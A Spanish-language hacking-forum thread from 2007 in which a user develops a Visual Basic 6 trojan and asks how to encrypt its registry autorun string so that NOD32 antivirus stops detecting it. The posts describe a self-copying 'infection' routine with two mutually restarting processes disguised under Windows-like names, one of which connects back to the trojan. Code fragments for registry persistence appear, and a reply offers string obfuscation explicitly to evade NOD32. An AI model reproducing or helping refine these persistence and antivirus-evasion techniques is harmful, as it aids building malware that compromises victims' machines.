Título: cifrar Cadena Registro Publicado por: hepy_92 en 16 Junio 2007, 17:40 pm wenasS
ase tiempo que estoy haciendo un troyano en vb6, y hace un tiempo el nod32 me lo empezo a detectar. Vivachapas me dijo que era por heuristica (o como se escriba xD), y se solucionaba cifrando la cadena del registro. Encontre un code bien corto y lo puse, el problema es que no lo entiendo para nada, y tengo varias aplicaciones que ocupan el mismo code para agregar y cifrar la cadena, entonces al parecer la remplaza :S alguien tiene algun code que pueda explicar? GRAcias de antemano ;D Título: Re: cifrar Cadena Registro Publicado por: hepy_92 en 16 Junio 2007, 19:23 pm aca les dejo el code que ocupo.. ahora que me doi cuenta, probablemente no sea esta la razon por la que se remplaze.. talvez me confundi o algo asi.. de todas maneras si ocupo este code:
Código: On Error GoTo fallo y cambio esta parte Código: Clave.regwrite Deb, Windows & "\EXPL0RER.exe" por esta Código: Clave.regwrite Deb, Windows & "\klass.exe" no deberia remplazarse o si???? Gracias de antemano :D Título: Re: cifrar Cadena Registro Publicado por: Jareth en 16 Junio 2007, 20:07 pm http://foro.elhacker.net/index.php/topic,163624.msg772555.html#msg772555
Ahi tienes un post donde preguntan lo mismo que tu. Pero para ayudarte porque no das todo el code? L funcion descifrar y la variable windows,tal vez el problema este ahi.... Título: Re: cifrar Cadena Registro Publicado por: hepy_92 en 17 Junio 2007, 16:47 pm ok se me habia olvidado parte del code xD
aca va Código: dim windows as string 'en general Título: Re: cifrar Cadena Registro Publicado por: hepy_92 en 17 Junio 2007, 17:42 pm ademas... ahora estoy haciendo que se autocopie a la carpeta de windows, estoy haciendo una funcion de "infeccion", comprueba cada cierto rato si existen ssms.exe y jushed.exe, si no existen, se autocopia a la carpeta de windows, y les pone ese nombre, y si existen, comprueba que los 2 esten abiertos, el ssms.exe, ayuda a que jushed.exe se mantenga siempre abierto, y jushed ayuda a que ssms.exe se mantenga abierto ademas de hacer la conexion a mi troyano. Esto funciona de maravilla.. hasta que llega el nod32, diciendo que esta infectado, y si quito estas lineas:
Código: WinDirek = Environ("windir") & "/" 'carpeta de windows se podria cifrar esto para que el maldito nod para de saltar??? gracias! Título: Re: cifrar Cadena Registro Publicado por: surfrio en 10 Julio 2007, 02:16 am Primeiro as funções..
Código: Private Function NumericPassword(ByVal password As String) As Long O códgio cifrado.. Código: Dim f, f2 As String assim o nod32 não pega |